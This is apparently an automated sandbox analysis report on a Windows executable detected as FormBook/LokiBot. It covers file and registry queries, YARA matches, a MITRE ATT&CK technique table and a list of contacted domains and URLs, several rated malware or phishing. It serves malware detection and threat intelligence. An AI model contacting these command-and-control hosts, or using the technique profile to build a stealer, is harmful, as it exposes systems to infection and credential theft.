Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Queries volume information: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\po8909893299832.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: C:\Program Files\Windows Defender\MSASCui.exe

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 16.2.InXlDTKncKkCk.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.InXlDTKncKkCk.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.1490594410.0000000003EE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1449357318.0000000003809000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1449357318.0000000004101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3855823096.0000000002FB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3856542244.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1502381208.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3854578861.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1495831223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 16.2.InXlDTKncKkCk.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.InXlDTKncKkCk.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.1490594410.0000000003EE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1449357318.0000000003809000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1449357318.0000000004101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3855823096.0000000002FB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3856542244.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1502381208.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3854578861.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1495831223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	612 Process Injection	1 Masquerading	OS Credential Dumping	341 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Shared Modules	Logon Script (Windows)	1 DLL Side-Loading	151 Virtualization/Sandbox Evasion	Security Account Manager	151 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	612 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	4 Obfuscated Files or Information	Cached Domain Credentials	112 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
po8909893299832.exe	47%	ReversingLabs	ByteCode-MSIL.Trojan.LokiBot
po8909893299832.exe	48%	Virustotal		Browse
po8909893299832.exe	100%	Avira	TR/AD.Swotter.guhjc
po8909893299832.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	100%	Avira	TR/AD.Swotter.guhjc
C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	47%	ReversingLabs	ByteCode-MSIL.Trojan.LokiBot

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
www.trexendofparadise.club	0%	Virustotal	Browse
musiletras.co	1%	Virustotal	Browse
www.blogonrunning.com	1%	Virustotal	Browse
system.ngo	1%	Virustotal	Browse
www.attack.info	4%	Virustotal	Browse
www.1509068.cc	3%	Virustotal	Browse
vagabondtracks.com	1%	Virustotal	Browse
www.lorenzodavissr.com	0%	Virustotal	Browse
www.system.ngo	0%	Virustotal	Browse
www.vagabondtracks.com	0%	Virustotal	Browse
www.thingsidonaked.com	0%	Virustotal	Browse
www.connect-talent.com	0%	Virustotal	Browse
api.msn.com	0%	Virustotal	Browse
www.musiletras.co	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://powerpoint.office.comer	0%	URL Reputation	safe
https://android.notify.windows.com/iOSA4	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://deff.nelreports.net/api/report?cat=msn	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1	0%	URL Reputation	safe
https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal	0%	URL Reputation	safe
http://www.microsoft.c	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://android.notify.windows.com/iOSd	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark	0%	URL Reputation	safe
http://www.trexendofparadise.club	0%	Avira URL Cloud	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://outlook.com	0%	URL Reputation	safe
http://www.musiletras.coReferer:	0%	Avira URL Cloud	safe
http://www.connect-talent.com	0%	Avira URL Cloud	safe
http://www.system.ngoReferer:	0%	Avira URL Cloud	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
http://www.trexendofparadise.club/hd05/www.system.ngo	0%	Avira URL Cloud	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	0%	URL Reputation	safe
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA	0%	URL Reputation	safe
https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark	0%	URL Reputation	safe
https://api.msn.com/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT	0%	URL Reputation	safe
https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/	0%	URL Reputation	safe
http://www.musiletras.co/hd05/	0%	Avira URL Cloud	safe
http://ns.adop	0%	Avira URL Cloud	safe
http://www.connect-talent.com	0%	Virustotal		Browse
http://www.trexendofparadise.club	0%	Virustotal		Browse
http://www.musiletras.co/hd05/	0%	Virustotal		Browse
http://www.thingsidonaked.com	0%	Virustotal		Browse
http://www.aquariusbusiness.info/hd05/www.satwaspin.net	100%	Avira URL Cloud	malware
http://www.q3hjns.shop/hd05/	0%	Avira URL Cloud	safe
http://www.thingsidonaked.com	0%	Avira URL Cloud	safe
http://www.taxilasamericas.com/hd05/	0%	Avira URL Cloud	safe
http://www.connect-talent.com/hd05/	0%	Avira URL Cloud	safe
http://www.codyscalls.com/hd05/	100%	Avira URL Cloud	malware
http://www.gaiacoreresearch.com/hd05/www.fursace.club	0%	Avira URL Cloud	safe
http://www.attack.infoReferer:	0%	Avira URL Cloud	safe
http://www.damtherncooling.com/hd05/	0%	Avira URL Cloud	safe
http://www.blogonrunning.com/hd05/www.trexendofparadise.club	100%	Avira URL Cloud	malware
http://www.lezxop.xyz	0%	Avira URL Cloud	safe
http://www.system.ngo	0%	Avira URL Cloud	safe
http://www.blogonrunning.com/hd05/www.lezxop.xyz	100%	Avira URL Cloud	malware
http://www.musiletras.co/hd05/www.connect-talent.com	0%	Avira URL Cloud	safe
http://www.damtherncooling.com/hd05/www.attack.info	0%	Avira URL Cloud	safe
http://www.evans-gdaddy-test-domain.online/hd05/www.7727.info	0%	Avira URL Cloud	safe
http://www.trexendofparadise.clubReferer:	0%	Avira URL Cloud	safe
http://www.system.ngo/hd05/	0%	Avira URL Cloud	safe
http://www.taxilasamericas.com/hd05/	0%	Virustotal		Browse
http://www.satwaspin.net	0%	Avira URL Cloud	safe
http://www.system.ngo	0%	Virustotal		Browse
http://www.vagabondtracks.com	0%	Avira URL Cloud	safe
http://www.system.ngo/hd05/	0%	Virustotal		Browse
http://www.dropshunter.net/hd05/www.furanoikedanouen.com	0%	Avira URL Cloud	safe
http://www.system.ngo/hd05/www.vagabondtracks.com	0%	Avira URL Cloud	safe
http://www.satwaspin.net	0%	Virustotal		Browse
http://www.lezxop.xyz	0%	Virustotal		Browse
http://www.9orwr6.vipReferer:	0%	Avira URL Cloud	safe
http://www.autoitscript.com/autoit3/J	0%	Avira URL Cloud	safe
http://www.lezxop.xyz/hd05/www.sparkfirestarter.net	0%	Avira URL Cloud	safe
http://www.blogonrunning.com	100%	Avira URL Cloud	malware
www.vagabondtracks.com/hd05/	0%	Avira URL Cloud	safe
http://www.1509068.cc/hd05/	100%	Avira URL Cloud	malware
http://www.furanoikedanouen.com/hd05/	0%	Avira URL Cloud	safe
http://www.codyscalls.comReferer:	0%	Avira URL Cloud	safe
http://www.connect-talent.comReferer:	0%	Avira URL Cloud	safe
http://www.gaiacoreresearch.com/hd05/	0%	Avira URL Cloud	safe
http://www.lezxop.xyzReferer:	0%	Avira URL Cloud	safe
https://api.msn.com:443/v1/news/Feed/Windows?FP	0%	Avira URL Cloud	safe
http://www.thingsidonaked.com/hd05/	0%	Avira URL Cloud	safe
http://www.blogonrunning.comReferer:	0%	Avira URL Cloud	safe
http://www.q3hjns.shop/hd05/www.blogonrunning.com	0%	Avira URL Cloud	safe
http://www.damtherncooling.com	0%	Avira URL Cloud	safe
http://www.evans-gdaddy-test-domain.online	0%	Avira URL Cloud	safe
http://www.attack.info	100%	Avira URL Cloud	phishing
http://www.thingsidonaked.comReferer:	0%	Avira URL Cloud	safe
http://www.7727.info	0%	Avira URL Cloud	safe
http://www.dropshunter.net	0%	Avira URL Cloud	safe
http://www.dropshunter.net/hd05/	0%	Avira URL Cloud	safe
http://www.sparkfirestarter.net	0%	Avira URL Cloud	safe
http://www.lorenzodavissr.com	0%	Avira URL Cloud	safe
http://www.aquariusbusiness.info	100%	Avira URL Cloud	malware
http://www.lorenzodavissr.com/hd05/www.q3hjns.shop	0%	Avira URL Cloud	safe
http://www.thingsidonaked.com/hd05/www.lorenzodavissr.com	0%	Avira URL Cloud	safe
http://www.trexendofparadise.club/hd05/	0%	Avira URL Cloud	safe
http://www.lezxop.xyz/hd05/	0%	Avira URL Cloud	safe
http://www.blogonrunning.com/hd05/?mJBXxJ=L307NeH5fWkLgKK43su7TNgrL3oq/VFX5jHnogZ3Xy90kbIeezXbjunmo4QVhDvcCpqA&_hrl=jxopsZ	100%	Avira URL Cloud	malware
http://www.thierrydoublein.comReferer:	0%	Avira URL Cloud	safe
http://www.blogonrunning.com/hd05/	100%	Avira URL Cloud	malware
http://www.thierrydoublein.com/hd05/	0%	Avira URL Cloud	safe
http://www.q3hjns.shopReferer:	0%	Avira URL Cloud	safe
http://www.7727.infoReferer:	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.trexendofparadise.club	103.224.212.212	true	true	0%, Virustotal, Browse	unknown
www.blogonrunning.com	3.64.163.50	true	true	1%, Virustotal, Browse	unknown
musiletras.co	216.246.47.89	true	true	1%, Virustotal, Browse	unknown
system.ngo	3.33.130.190	true	true	1%, Virustotal, Browse	unknown
www.damtherncooling.com	188.114.97.3	true	true		unknown
www.attack.info	72.14.178.174	true	true	4%, Virustotal, Browse	unknown
www.1509068.cc	34.92.138.115	true	false	3%, Virustotal, Browse	unknown
vagabondtracks.com	205.134.241.76	true	true	1%, Virustotal, Browse	unknown
www.lorenzodavissr.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.connect-talent.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.musiletras.co	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.system.ngo	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.vagabondtracks.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.thingsidonaked.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
api.msn.com	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
